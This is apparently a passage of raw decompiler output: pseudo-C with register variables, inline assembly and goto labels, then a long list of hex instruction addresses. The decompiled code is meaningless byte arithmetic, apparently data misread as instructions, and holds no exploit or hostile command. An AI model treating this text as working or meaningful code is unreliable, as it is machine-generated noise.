										__bh = __bh +  *((intOrPtr*)(__ebx - 0x49));
										 *__eax =  *__eax + __al;
										__al = __al + 0x2b;
										__eflags = __al;
										L24:
										__eax = __eax -  *__eax;
										__ah = __ah -  *__edx;
										__al = __al +  *__ebx;
										__eflags = __al;
										if(__al >= 0) {
											goto L19;
										} else {
											 *__eax =  *__eax + __al;
											__al = __al + 0x2a;
											__bh = __bh +  *[es:ebx-0x48];
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
											L26:
											__al = __al + 0x2b;
											 *__edx =  *__edx + __ch;
											__al = __al &  *__edx;
											__eflags = __al;
											L27:
											__edi = __edi +  *((intOrPtr*)(__ebp - 0x48));
											 *__eax =  *__eax + __al;
											__al = __al + 0x2a;
											__bh = __bh +  *[es:ebx-0x47];
											 *__eax =  *__eax + __al;
											__al = __al + 0x2b;
											 *__edx =  *__edx + __ch;
											 *__eax =  *__eax + __al;
											asm("adc esi, [eax]");
											__al = __al +  *__eax;
											asm("aaa");
											 *__eax =  *__eax + __al;
											 *__edi =  *__edi + __al;
											 *__ecx =  *__ecx + __dl;
											__bh = __bh + __dh;
											_push(es);
											__fp0 = __fp0 +  *__ecx;
											 *__esi =  *__esi + __al;
											__eflags =  *__esi;
										}
									} else {
										 *__eax =  *__eax + __al;
										__ah = __ah |  *(__esi + 0xa010000 + __edi * 2);
										 *__ebx =  *__ebx + __ch;
										__edx = __edx + 1;
										 *__ecx =  *__ecx + __bl;
										__edi = __esi;
										 *__ecx =  *__ecx + __al;
										__eax = __eax & 0x28021616;
										_push(__esp);
										 *__eax =  *__eax + __eax;
										__dh = __dh | __ebx[0x16];
										 *__eax =  *__eax + __al;
										__eflags =  *__eax;
										L19:
										__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
										_pop(ss);
										__ch = __ch +  *__eax;
										_push(__ebx);
										 *__eax =  *__eax + __eax;
										__al = __al |  *__edx;
										 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) - __dl;
										__dh = __dh | __ebx[0x16];
										 *__eax =  *__eax + __al;
										__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
										__eflags = __ah;
										asm("sbb [esi], dl");
										_push(ss);
										if(__eflags < 0) {
											 *__eax =  *__eax + __al;
											__ah = __ah |  *(__esi + 0xa010000 + __edi * 2);
											__eflags = __ah;
											L21:
											asm("movsb");
											if (__eflags <= 0) goto L22;
											 *__ecx =  *__ecx + __al;
											__al = __al |  *__eax;
											 *__eax =  *__eax + __al;
											__eax = __eax +  *((intOrPtr*)(__esi + __eax));
											asm("outsd");
											_t84 = __eax;
											__eax = __ecx;
											__ecx = _t84;
											 *__eax =  *__eax + __eax;
											__al = __al |  *__eax;
											__ah = __ah -  *__esi;
											__eflags = __ah;
											goto L23;
										}
									}
									if(__eflags >= 0) {
										goto L21;
									}
									__al = __al +  *__eax;
									_push(es);
									__al = __al |  *__edx;
									__eflags = __al;
									if(__al != 0) {
										goto L24;
									}
									 *__eax =  *__eax + __al;
									__al = __al + 0xb;
									_pop(es);
									__al = __al - 7;
									_pop(es);
									_push(es);
									asm("outsd");
									__eax = __edx;
									 *__esi =  *__esi + __al;
									__al = __al +  *__ebx;
									__eflags = __al;
									if(__al >= 0) {
										goto L26;
									}
									 *__eax =  *__eax + __al;
									__al = __al + 2;
									__eflags = __al;
									if(__al != 0) {
										goto L27;
									}
									 *__eax =  *__eax + __al;
									__al = __al + 0xb;
									_pop(es);
									__al = __al - 7;
									__eflags = __al;
									while(1) {
										L33:
										_pop(es);
										_pop(es);
										_push(es);
										asm("outsd");
										 *__edx = es;
										 *__esi =  *__esi + __al;
										__al = __al -  *__eax;
										asm("adc esi, [eax]");
										 *__eax =  *__eax + __eax;
										 *__eax =  *__eax + __al;
										__eax = __eax - 1;
										 *__eax =  *__eax + __al;
										asm("adc [eax], eax");
										__ch = __ch +  *((intOrPtr*)(__edi - 0x39));
										 *__eax =  *__eax + __eax;
										_push(es);
										__ch = __ch |  *__ebx;
										 *__esi =  *__esi + __al;
										__al = __al -  *__esi;
										__al = __al +  *__ebx;
										asm("outsd");
										asm("enter 0x1, 0x6");
										 *__edx =  *__edx + __al;
										__eflags =  *__edx;
										while(1) {
											L34:
											 *(__eax + 0xa0000) =  *(__eax + 0xa0000) - __cl;
											__al = __al -  *__eax;
											 *__ebx =  *__ebx + __dl;
											 *__ecx =  *__ecx ^ __al;
											 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __cl;
											 *__eax =  *__eax + __al;
											 *__ecx =  *__ecx + __dl;
											 *__edx =  *__edx + __al;
											__eflags =  *__edx;
											if( *__edx != 0) {
												goto L33;
											}
											 *__eax =  *__eax + __al;
											__al = __al + 0xa;
											__eax = __eax -  *__eax;
											__eflags = __eax;
											_push(es);
											while(1) {
												L36:
												__dl = __dl -  *__ebx;
												 *__ebx =  *__ebx ^ __al;
												 *__esi =  *__esi + __ah;
												 *__eax =  *__eax + __al;
												 *__ecx =  *__ecx + __cl;
												 *__eax =  *__eax + __al;
												asm("adc [eax], eax");
												__bh = __bh +  *((intOrPtr*)(__ebx - 0x46));
												 *__eax =  *__eax + __al;
												__al = __al + 3;
												_push(ss);
												 *((intOrPtr*)(__ecx + 0x160a0000)) =  *((intOrPtr*)(__ecx + 0x160a0000)) - __cl;
												 *__ebx =  *__ebx + 1;
												__al = __al |  *__esi;
												__al = __al - 0xf;
												__al = __al +  *__ebx;
												__eflags = __al;
												if(__al >= 0) {
													goto L34;
												}
												 *__eax =  *__eax + __al;
												__al = __al + 2;
												__eflags = __al;
												while(1) {
													L38:
													__ch = __ch +  *__eax;
													 *__eax = __al;
													 *__edx =  *__edx + __cl;
													 *__eax =  *__eax + __al;
													 *__edx =  *__edx + __ch;
													 *__eax =  *__eax + __al;
													asm("adc esi, [eax]");
													 *__eax =  *__eax + __eax;
													 *__eax =  *__eax + __al;
													 *__eax =  *__eax | __eax;
													 *__ecx =  *__ecx + __dl;
													 *__edx =  *__edx + __al;
													__eflags =  *__edx;
													if( *__edx != 0) {
														goto L36;
													}
													 *__eax =  *__eax + __al;
													__al = __al + 0xa;
													__eax = __eax -  *__eax;
													_push(es);
													__dl = __dl -  *__ebx;
													 *__edx =  *__edx ^ __al;
													 *__edx =  *__edx + __ah;
													 *__eax =  *__eax + __al;
													 *__ecx =  *__ecx + __cl;
													 *__eax =  *__eax + __al;
													asm("adc [eax], eax");
													__bh = __bh +  *((intOrPtr*)(__ebx - 0x45));
													 *__eax =  *__eax + __al;
													__al = __al + 3;
													 *__ecx =  *__ecx + 1;
													__eflags =  *__ecx;
													while(1) {
														L40:
														 *__esi =  *__esi + __edx;
														 *__ecx =  *__ecx + 1;
														__al = __al |  *__esi;
														__al = __al - 0xf;
														__al = __al +  *__ebx;
														__eflags = __al;
														if(__al >= 0) {
															goto L38;
														}
														 *__eax =  *__eax + __al;
														__al = __al + 2;
														_t96 = __eax + 0xa0000;
														 *_t96 =  *(__eax + 0xa0000) - __cl;
														__eflags =  *_t96;
														while(1) {
															 *__eax = __al;
															 *__edx =  *__edx + __cl;
															 *__eax =  *__eax + __al;
															__eflags =  *__eax;
															while(1) {
																L43:
																 *__edx =  *__edx + __ch;
																 *__eax =  *__eax + __al;
																asm("adc esi, [eax]");
																 *__eax =  *__eax + __eax;
																__eflags =  *__eax;
																while(1) {
																	L44:
																	 *__eax =  *__eax + __al;
																	__ecx = __ecx - 1;
																	 *__eax =  *__eax + __al;
																	asm("adc [eax], eax");
																	__bh = __bh +  *((intOrPtr*)(__ebx - 0x43));
																	 *__eax =  *__eax + __al;
																	__al = __al + 0xa;
																	__eflags = __al;
																	while(1) {
																		L45:
																		__eax = __eax -  *__eax;
																		_push(es);
																		__dl = __dl -  *__ebx;
																		 *__edx =  *__edx ^ __al;
																		 *__ecx =  *__ecx + __dl;
																		 *__eax =  *__eax + __al;
																		__al = __al ^  *__eax;
																		 *__ecx =  *__ecx + __dl;
																		 *__edx =  *__edx + __al;
																		__eflags =  *__edx;
																		if( *__edx != 0) {
																			goto L40;
																		}
																		 *__eax =  *__eax + __al;
																		__al = __al + 3;
																		 *__ecx =  *__ecx + 1;
																		_push(ss);
																		 *__ecx =  *__ecx + 1;
																		__al = __al |  *__esi;
																		__al = __al - 0x3e;
																		__al = __al +  *__ebx;
																		__eflags = __al;
																		if(__al >= 0) {
																			 *__eax = __al;
																			 *__edx =  *__edx + __cl;
																			 *__eax =  *__eax + __al;
																			__eflags =  *__eax;
																			L43:
																			 *__edx =  *__edx + __ch;
																			 *__eax =  *__eax + __al;
																			asm("adc esi, [eax]");
																			 *__eax =  *__eax + __eax;
																			__eflags =  *__eax;
																			L44:
																			 *__eax =  *__eax + __al;
																			__ecx = __ecx - 1;
																			 *__eax =  *__eax + __al;
																			asm("adc [eax], eax");
																			__bh = __bh +  *((intOrPtr*)(__ebx - 0x43));
																			 *__eax =  *__eax + __al;
																			__al = __al + 0xa;
																			__eflags = __al;
																			continue;
																		}
																		 *__eax =  *__eax + __al;
																		__al = __al + 2;
																		__eflags = __al;
																		if(__al != 0) {
																			goto L43;
																		}
																		 *__eax =  *__eax + __al;
																		__al = __al + 0x2c;
																		__eax = __eax |  *__edx;
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L44;
																		}
																		 *__eax =  *__eax + __al;
																		__al = __al + 0x19;
																		 *__ecx =  *__ecx + 1;
																		__eax = __eax -  *__ecx;
																		_pop(ss);
																		__eax = __eax |  *__edi;
																		__al = __al - 0xa;
																		__dl = __dl +  *__esi;
																		__eflags = __dl;
																		if(__dl >= 0) {
																			continue;
																		}
																		 *__eax =  *__eax + __al;
																		__al = __al;
																		__ecx = __ecx -  *0xb4200200;
																		 *__eax =  *__eax + __al;
																		 *((intOrPtr*)(__ebp - 0x44)) =  *((intOrPtr*)(__ebp - 0x44)) + __bh;
																		 *__eax =  *__eax + __al;
																		__al = __al;
																		__ch = __ch +  *__eax;
																		__eflags = __ch;
																		 *__eax = __al;
																		while(1) {
																			L51:
																			 *__edx =  *__edx + __cl;
																			 *__eax =  *__eax + __al;
																			 *__edx =  *__edx + __ch;
																			 *__eax =  *__eax + __al;
																			 *__ebx =  *__ebx + __dl;
																			 *__ecx =  *__ecx ^ __al;
																			 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __cl;
																			 *__eax =  *__eax + __al;
																			__edx = __edx - 1;
																			 *__eax =  *__eax + __al;
																			asm("adc [eax], eax");
																			__bh = __bh +  *((intOrPtr*)(__ebx - 0x42));
																			 *__eax =  *__eax + __al;
																			__al = __al + 0xa;
																			__eax = __eax -  *__eax;
																			__eflags = __eax;
																			_push(es);
																			while(1) {
																				__dl = __dl -  *__ebx;
																				 *__edx =  *__edx ^ __al;
																				 *__edx =  *__edx + __ah;
																				 *__eax =  *__eax + __al;
																				 *__ecx =  *__ecx + __cl;
																				 *__eax =  *__eax + __al;
																				asm("adc [eax], eax");
																				__bh = __bh +  *((intOrPtr*)(__ebx - 0x42));
																				 *__eax =  *__eax + __al;
																				__al = __al + 3;
																				 *__ecx =  *__ecx + 1;
																				_push(ss);
																				 *__ecx =  *__ecx + 1;
																				__al = __al |  *__esi;
																				__al = __al - 0xf;
																				__al = __al +  *__ebx;
																				__eflags = __al;
																				if(__al >= 0) {
																					goto L51;
																				}
																				 *__eax =  *__eax + __al;
																				__al = __al + 2;
																				 *(__eax + 0xa0000) =  *(__eax + 0xa0000) - __cl;
																				 *__eax =  *__eax + __al;
																				__al = __al -  *__eax;
																				 *__ebx =  *__ebx + __dl;
																				 *__ecx =  *__ecx ^ __al;
																				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __cl;
																				 *__eax =  *__eax + __al;
																				asm("adc al, 0x0");
																				 *__ecx =  *__ecx + __dl;
																				 *__edx =  *__edx + __al;
																				__eflags =  *__edx;
																				if ( *__edx != 0) goto L52;
																				while(1) {
																					L54:
																					__edi = 0xa040000;
																					 *__eax =  *__eax + __al;
																					__al = __al + 0xa;
																					__eax = __eax -  *__eax;
																					_push(es);
																					__dl = __dl -  *__ebx;
																					 *__edx =  *__edx ^ __al;
																					 *__ecx =  *__ecx + __bh;
																					 *__eax =  *__eax + __al;
																					 *__edx =  *__edx + __dh;
																					 *__eax =  *__eax + __al;
																					asm("adc [eax], eax");
																					__edx = __edx +  *__esi;
																					__cl = __cl ^  *__edx;
																					__esp = __esp +  *__eax;
																					 *__eax =  *__eax + 1;
																					 *__eax =  *__eax + __al;
																					 *__edx =  *__edx + 1;
																					__eflags =  *__edx;
																					while(1) {
																						__ch = __ch +  *__ebx;
																						 *__edi =  *__edi + __edx;
																						__al = __al |  *__esi;
																						__al = __al - 4;
																						_pop(ds);
																						asm("adc [fs:ecx], al");
																						__bh = __bh +  *((intOrPtr*)(__ebx - 0x41));
																						 *__eax =  *__eax + __al;
																						__al = __al + 3;
																						 *__ecx =  *__ecx + 1;
																						_push(ss);
																						 *__ecx =  *__ecx + 1;
																						__eax = __eax |  *__edi;
																						__al = __al - 0xf;
																						__al = __al +  *__ebx;
																						__eflags = __al;
																						if(__al >= 0) {
																							goto L54;
																						}
																						 *__eax =  *__eax + __al;
																						__al = __al + 2;
																						 *(__eax + 0xa0000) =  *(__eax + 0xa0000) - __cl;
																						 *__eax =  *__eax + __al;
																						__al = __al -  *__eax;
																						 *__eax =  *__eax + __al;
																						asm("adc esi, [eax]");
																						 *__eax =  *__eax + __eax;
																						 *__eax =  *__eax + __al;
																						asm("adc al, 0x0");
																						 *__ecx =  *__ecx + __dl;
																						 *__edx =  *__edx + __al;
																						__eflags =  *__edx;
																						if( *__edx != 0) {
																							continue;
																						} else {
																							goto L58;
																						}
																						while(1) {
																							L58:
																							 *__eax =  *__eax + __al;
																							__al = __al + 0xa;
																							__eax = __eax -  *__eax;
																							_push(es);
																							__dl = __dl -  *__ebx;
																							 *__edx =  *__edx ^ __al;
																							 *__ecx =  *__ecx + __bh;
																							 *__eax =  *__eax + __al;
																							 *__edx =  *__edx + __dh;
																							 *__eax =  *__eax + __al;
																							asm("adc [eax], eax");
																							__edx = __edx +  *__esi;
																							__cl = __cl ^  *__edx;
																							__esp = __esp +  *__eax;
																							_push(0xfe000001);
																							__ch = __ch +  *__ebx;
																							__eflags = __ch;
																							while(1) {
																								L59:
																								__eax = __eax -  *__ecx;
																								_pop(ss);
																								__al = __al |  *__esi;
																								__al = __al - 4;
																								_pop(ds);
																								__eax = __eax - 0x7b020110;
																								asm("rol byte [eax], 0x0");
																								__al = __al + 3;
																								 *__ecx =  *__ecx + 1;
																								_push(ss);
																								 *__ecx =  *__ecx + 1;
																								__eax = __eax |  *__edi;
																								__al = __al - 0xf;
																								__al = __al +  *__ebx;
																								__eflags = __al;
																								if(__al >= 0) {
																									goto L58;
																								}
																								 *__eax =  *__eax + __al;
																								__al = __al + 2;
																								_t112 = __eax + 0xa0000;
																								 *_t112 =  *(__eax + 0xa0000) - __cl;
																								__eflags =  *_t112;
																								while(1) {
																									 *__edx =  *__edx + __cl;
																									 *__eax =  *__eax + __al;
																									 *__edx =  *__edx + __ch;
																									 *__eax =  *__eax + __al;
																									 *__ebx =  *__ebx + __dl;
																									 *__ecx =  *__ecx ^ __al;
																									 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __cl;
																									 *__eax =  *__eax + __al;
																									asm("adc [eax], eax");
																									 *__ecx =  *__ecx + __dl;
																									 *__edx =  *__edx + __al;
																									__eflags =  *__edx;
																									if( *__edx != 0) {
																										goto L59;
																									}
																									 *__eax =  *__eax + __al;
																									__al = __al + 0xa;
																									__eax = __eax -  *__eax;
																									_push(es);
																									__ah = __ah -  *__esi;
																									 *__edx =  *__edx + __al;
																									__edi = __edi +  *((intOrPtr*)(__ebp - 0x3f));
																									 *__eax =  *__eax + __al;
																									__al = __al + 0x2a;
																									 *__eax =  *__eax + __al;
																									asm("adc esi, [eax]");
																									 *__eax =  *__eax + __eax;
																									 *__eax =  *__eax + __al;
																									 *__eax =  *__eax | __eax;
																									 *__ecx =  *__ecx + __dl;
																									 *__edx =  *__edx + __al;
																									__eflags =  *__edx;
																									if( *__edx != 0) {
																										continue;
																									}
																									 *__eax =  *__eax + __al;
																									__al = __al + 0xa;
																									__eax = __eax -  *__eax;
																									__eflags = __eax;
																									 *__esi =  *__esi + __al;
																									__dl = __dl -  *__ebx;
																									 *__edx =  *__edx ^ __al;
																									 *__ebx =  *__ebx + __dl;
																									 *__eax =  *__eax + __al;
																									__ebx = __ebx - 1;
																									 *__eax =  *__eax + __al;
																									asm("adc [eax], eax");
																									__bh = __bh +  *((intOrPtr*)(__ebx - 0x3e));
																									 *__eax =  *__eax + __al;
																									__al = __al + 0x12;
																									__esi = __esi + __edi;
																									asm("adc eax, 0x1000034");
																									 *__edi =  *__edi + __eax;
																									_t118 =  &(__ebx[0]);
																									 *_t118 = __ebx[0] - __ch;
																									__eflags =  *_t118;
																									 *__eax =  *__eax + __eax;
																									__cl = __cl |  *__edx;
																									_push(es);
																									__al = __al +  *__edx;
																									_t120 = __edx + 0x7d0a0001;
																									 *_t120 =  *(__edx + 0x7d0a0001) - __dl;
																									__eflags =  *_t120;
																									return __eax;
																									goto L67;
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L40;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
							L67:
						}
						goto L4;
					}
				}
				while(1) {
					L2:
					_t10 = _t140;
					 *_t10 =  *_t140;
					if( *_t10 == 0) {
						break;
					}
					 *0 =  *0;
					_t126 = 1 &  *0x00000001;
					 *_t126 =  *_t126 + _t126;
					 *((intOrPtr*)(_t141 - 0x73)) =  *((intOrPtr*)(_t141 - 0x73)) + _t139;
					 *_t126 =  *_t126 + _t126;
					_t127 = _t126 |  *_t126;
					 *_t127 =  *_t127 + _t127;
					_t140 = _t140 |  *_t142;
					_t139 = _t139 +  *_t127;
					 *_t139 = es;
					 *_t140 =  *_t140 + _t139;
					_t128 = _t127 | 0x5e280312;
					 *_t128 =  *_t128 + _t128;
					 *_t128 =  *_t128 + _t128;
					 *((intOrPtr*)(_t141 - 0x73)) =  *((intOrPtr*)(_t141 - 0x73)) + _t139;
					 *_t128 =  *_t128 + _t128;
					_t130 = (_t128 |  *_t128) -  *(_t128 |  *_t128);
					 *_t140 =  *_t140 + _t130;
					_t143 = _t143 +  *((intOrPtr*)(_t141 + 0x51));
					 *_t130 =  *_t130 + _t130;
				}
				 *0 =  *0;
				return 0x28;
				goto L67;
			}












                                  0x0010b8b3
                                  0x0010b8b3
                                  0x0010b8b3
                                  0x0010b8b4
                                  0x0010b8b6
                                  0x0010b8b7
                                  0x0010b8b9
                                  0x0010b8bb
                                  0x0010b8bd
                                  0x0010b8be
                                  0x0010b8bf
                                  0x0010b8c4
                                  0x0010b8c8
                                  0x0010b8cd
                                  0x0010b8d2
                                  0x0010b8d2
                                  0x0010b8d2
                                  0x0010b8d3
                                  0x0010b8d5
                                  0x0010b8db
                                  0x0010b8dd
                                  0x0010b8df
                                  0x0010b8e1
                                  0x0010b8e3
                                  0x0010b8e5
                                  0x0010b8e7
                                  0x0010b8e9
                                  0x0010b8ec
                                  0x0010b8ee
                                  0x0010b8f0
                                  0x0010b8f1
                                  0x0010b8f3
                                  0x0010b8f3
                                  0x0010b8f5
                                  0x00000000
                                  0x00000000
                                  0x0010b8f7
                                  0x0010b8f7
                                  0x0010b8f8
                                  0x0010b8f8
                                  0x0010b8fb
                                  0x0010b8ff
                                  0x0010b8ff
                                  0x0010b901
                                  0x0010b901
                                  0x0010b901
                                  0x0010b902
                                  0x0010b903
                                  0x0010b906
                                  0x0010b908
                                  0x0010b90a
                                  0x0010b90c
                                  0x0010b90e
                                  0x0010b910
                                  0x0010b912
                                  0x0010b914
                                  0x0010b915
                                  0x0010b917
                                  0x0010b91a
                                  0x0010b91c
                                  0x0010b91c
                                  0x0010b91e
                                  0x00000000
                                  0x00000000
                                  0x0010b920
                                  0x0010b922
                                  0x0010b924
                                  0x0010b92a
                                  0x0010b92d
                                  0x0010b92f
                                  0x0010b931
                                  0x0010b937
                                  0x0010b939
                                  0x0010b93a
                                  0x0010b93c
                                  0x0010b93e
                                  0x0010b940
                                  0x0010b942
                                  0x0010b942
                                  0x0010b944
                                  0x0010b8f8
                                  0x0010b8fb
                                  0x0010b8ff
                                  0x0010b8ff
                                  0x00000000
                                  0x0010b946
                                  0x0010b946
                                  0x0010b948
                                  0x0010b94a
                                  0x0010b94c
                                  0x0010b94c
                                  0x0010b94e
                                  0x00000000
                                  0x0010b950
                                  0x0010b950
                                  0x0010b952
                                  0x0010b954
                                  0x0010b956
                                  0x0010b958
                                  0x0010b95a
                                  0x0010b95e
                                  0x0010b965
                                  0x0010b967
                                  0x0010b96b
                                  0x0010b96d
                                  0x0010b96f
                                  0x0010b973
                                  0x0010b97a
                                  0x0010b97c
                                  0x0010b980
                                  0x0010b982
                                  0x0010b984
                                  0x0010b986
                                  0x0010b988
                                  0x0010b98a
                                  0x0010b98c
                                  0x0010b98e
                                  0x0010b993
                                  0x0010b996
                                  0x0010b998
                                  0x0010b99a
                                  0x0010b99d
                                  0x0010b99f
                                  0x0010b9a4
                                  0x0010b9a5
                                  0x0010b9a7
                                  0x0010b9ae
                                  0x0010b9af
                                  0x0010b9b1
                                  0x0010b9b2
                                  0x0010b9b4
                                  0x0010b9b4
                                  0x0010b9b6
                                  0x0010ba13
                                  0x0010ba13
                                  0x0010ba1a
                                  0x0010ba1f
                                  0x0010ba21
                                  0x0010ba23
                                  0x0010ba25
                                  0x0010ba28
                                  0x0010ba2e
                                  0x0010ba33
                                  0x0010ba35
                                  0x0010ba37
                                  0x0010ba3b
                                  0x0010ba3e
                                  0x0010ba40
                                  0x0010ba40
                                  0x00000000
                                  0x0010b9b8
                                  0x0010b9b8
                                  0x0010b9ba
                                  0x0010b9c1
                                  0x0010b9c3
                                  0x0010b9c5
                                  0x0010b9c6
                                  0x0010b9c8
                                  0x0010b9cb
                                  0x0010b9cd
                                  0x0010b9d5
                                  0x0010b9d7
                                  0x0010b9d8
                                  0x0010b9da
                                  0x0010b9e0
                                  0x0010b9e5
                                  0x0010b9e7
                                  0x0010b9e7
                                  0x0010b9e9
                                  0x0010ba46
                                  0x0010ba46
                                  0x0010ba4b
                                  0x0010ba4c
                                  0x0010ba4e
                                  0x0010ba51
                                  0x0010ba53
                                  0x0010ba53
                                  0x0010b9eb
                                  0x0010b9eb
                                  0x0010b9ed
                                  0x0010b9ed
                                  0x0010b9f4
                                  0x0010b9f5
                                  0x0010b9f6
                                  0x0010b9f7
                                  0x0010b9f9
                                  0x0010b9fb
                                  0x0010ba02
                                  0x0010ba04
                                  0x0010ba07
                                  0x0010ba09
                                  0x0010ba0b
                                  0x0010ba0c
                                  0x0010ba0e
                                  0x0010ba11
                                  0x0010ba11
                                  0x00000000
                                  0x0010ba11
                                  0x0010b9f7
                                  0x0010b9e9
                                  0x0010ba54
                                  0x0010ba55
                                  0x0010ba57
                                  0x0010ba59
                                  0x0010ba5e
                                  0x0010ba60
                                  0x0010ba60
                                  0x0010ba62
                                  0x0010babf
                                  0x0010babf
                                  0x0010bac2
                                  0x0010bac4
                                  0x0010bac4
                                  0x0010bac5
                                  0x0010bac5
                                  0x0010bac7
                                  0x0010bac9
                                  0x0010bac9
                                  0x0010bacb
                                  0x00000000
                                  0x0010bacd
                                  0x0010bacd
                                  0x0010bacf
                                  0x0010bad1
                                  0x0010bad5
                                  0x0010bad5
                                  0x0010bad7
                                  0x0010bad7
                                  0x0010bad9
                                  0x0010badb
                                  0x0010badb
                                  0x0010badd
                                  0x0010badd
                                  0x0010bae0
                                  0x0010bae2
                                  0x0010bae4
                                  0x0010bae8
                                  0x0010baea
                                  0x0010baec
                                  0x0010baee
                                  0x0010baf0
                                  0x0010baf2
                                  0x0010baf4
                                  0x0010baf5
                                  0x0010baf7
                                  0x0010bafa
                                  0x0010bafc
                                  0x0010bafe
                                  0x0010baff
                                  0x0010bb01
                                  0x0010bb01
                                  0x0010bb01
                                  0x0010ba64
                                  0x0010ba64
                                  0x0010ba66
                                  0x0010ba6d
                                  0x0010ba6f
                                  0x0010ba70
                                  0x0010ba72
                                  0x0010ba75
                                  0x0010ba77
                                  0x0010ba7c
                                  0x0010ba7d
                                  0x0010ba7f
                                  0x0010ba82
                                  0x0010ba82
                                  0x0010ba84
                                  0x0010ba84
                                  0x0010ba8b
                                  0x0010ba8c
                                  0x0010ba8e
                                  0x0010ba8f
                                  0x0010ba91
                                  0x0010ba93
                                  0x0010ba97
                                  0x0010ba9a
                                  0x0010ba9c
                                  0x0010ba9c
                                  0x0010baa3
                                  0x0010baa5
                                  0x0010baa6
                                  0x0010baa8
                                  0x0010baaa
                                  0x0010baaa
                                  0x0010baab
                                  0x0010baab
                                  0x0010baac
                                  0x0010baae
                                  0x0010bab0
                                  0x0010bab2
                                  0x0010bab4
                                  0x0010bab7
                                  0x0010bab8
                                  0x0010bab8
                                  0x0010bab8
                                  0x0010bab9
                                  0x0010babb
                                  0x0010babd
                                  0x0010babd
                                  0x00000000
                                  0x0010babd
                                  0x0010baa6
                                  0x0010bb03
                                  0x00000000
                                  0x00000000
                                  0x0010bb05
                                  0x0010bb07
                                  0x0010bb08
                                  0x0010bb08
                                  0x0010bb0a
                                  0x00000000
                                  0x00000000
                                  0x0010bb0c
                                  0x0010bb0e
                                  0x0010bb10
                                  0x0010bb11
                                  0x0010bb13
                                  0x0010bb14
                                  0x0010bb15
                                  0x0010bb16
                                  0x0010bb18
                                  0x0010bb1a
                                  0x0010bb1a
                                  0x0010bb1c
                                  0x00000000
                                  0x00000000
                                  0x0010bb1e
                                  0x0010bb20
                                  0x0010bb20
                                  0x0010bb22
                                  0x00000000
                                  0x00000000
                                  0x0010bb24
                                  0x0010bb26
                                  0x0010bb28
                                  0x0010bb29
                                  0x0010bb29
                                  0x0010bb2a
                                  0x0010bb2a
                                  0x0010bb2a
                                  0x0010bb2b
                                  0x0010bb2c
                                  0x0010bb2d
                                  0x0010bb2e
                                  0x0010bb30
                                  0x0010bb32
                                  0x0010bb34
                                  0x0010bb36
                                  0x0010bb3a
                                  0x0010bb3c
                                  0x0010bb3d
                                  0x0010bb3f
                                  0x0010bb41
                                  0x0010bb44
                                  0x0010bb46
                                  0x0010bb47
                                  0x0010bb49
                                  0x0010bb4b
                                  0x0010bb4e
                                  0x0010bb50
                                  0x0010bb51
                                  0x0010bb55
                                  0x0010bb55
                                  0x0010bb57
                                  0x0010bb57
                                  0x0010bb57
                                  0x0010bb5d
                                  0x0010bb5f
                                  0x0010bb61
                                  0x0010bb63
                                  0x0010bb66
                                  0x0010bb6a
                                  0x0010bb6c
                                  0x0010bb6c
                                  0x0010bb6e
                                  0x00000000
                                  0x00000000
                                  0x0010bb70
                                  0x0010bb72
                                  0x0010bb74
                                  0x0010bb74
                                  0x0010bb76
                                  0x0010bb77
                                  0x0010bb77
                                  0x0010bb77
                                  0x0010bb79
                                  0x0010bb7b
                                  0x0010bb7d
                                  0x0010bb7f
                                  0x0010bb81
                                  0x0010bb83
                                  0x0010bb85
                                  0x0010bb88
                                  0x0010bb8a
                                  0x0010bb8c
                                  0x0010bb8d
                                  0x0010bb93
                                  0x0010bb95
                                  0x0010bb97
                                  0x0010bb99
                                  0x0010bb99
                                  0x0010bb9b
                                  0x00000000
                                  0x00000000
                                  0x0010bb9d
                                  0x0010bb9f
                                  0x0010bb9f
                                  0x0010bba0
                                  0x0010bba0
                                  0x0010bba0
                                  0x0010bba2
                                  0x0010bba4
                                  0x0010bba6
                                  0x0010bba8
                                  0x0010bbaa
                                  0x0010bbac
                                  0x0010bbae
                                  0x0010bbb2
                                  0x0010bbb4
                                  0x0010bbb6
                                  0x0010bbb8
                                  0x0010bbb8
                                  0x0010bbba
                                  0x00000000
                                  0x00000000
                                  0x0010bbbc
                                  0x0010bbbe
                                  0x0010bbc0
                                  0x0010bbc2
                                  0x0010bbc3
                                  0x0010bbc5
                                  0x0010bbc7
                                  0x0010bbc9
                                  0x0010bbcb
                                  0x0010bbcd
                                  0x0010bbcf
                                  0x0010bbd1
                                  0x0010bbd4
                                  0x0010bbd6
                                  0x0010bbd8
                                  0x0010bbd8
                                  0x0010bbd9
                                  0x0010bbd9
                                  0x0010bbd9
                                  0x0010bbdb
                                  0x0010bbdd
                                  0x0010bbdf
                                  0x0010bbe1
                                  0x0010bbe1
                                  0x0010bbe3
                                  0x00000000
                                  0x00000000
                                  0x0010bbe5
                                  0x0010bbe7
                                  0x0010bbe9
                                  0x0010bbe9
                                  0x0010bbe9
                                  0x0010bbea
                                  0x0010bbea
                                  0x0010bbec
                                  0x0010bbee
                                  0x0010bbee
                                  0x0010bbf0
                                  0x0010bbf0
                                  0x0010bbf0
                                  0x0010bbf2
                                  0x0010bbf4
                                  0x0010bbf6
                                  0x0010bbf6
                                  0x0010bbf8
                                  0x0010bbfa
                                  0x0010bbfa
                                  0x0010bbfc
                                  0x0010bbfd
                                  0x0010bbff
                                  0x0010bc01
                                  0x0010bc04
                                  0x0010bc06
                                  0x0010bc06
                                  0x0010bc08
                                  0x0010bc08
                                  0x0010bc08
                                  0x0010bc0a
                                  0x0010bc0b
                                  0x0010bc0d
                                  0x0010bc0f
                                  0x0010bc12
                                  0x0010bc14
                                  0x0010bc16
                                  0x0010bc18
                                  0x0010bc18
                                  0x0010bc1a
                                  0x00000000
                                  0x00000000
                                  0x0010bc1c
                                  0x0010bc1e
                                  0x0010bc20
                                  0x0010bc22
                                  0x0010bc23
                                  0x0010bc25
                                  0x0010bc27
                                  0x0010bc29
                                  0x0010bc29
                                  0x0010bc2b
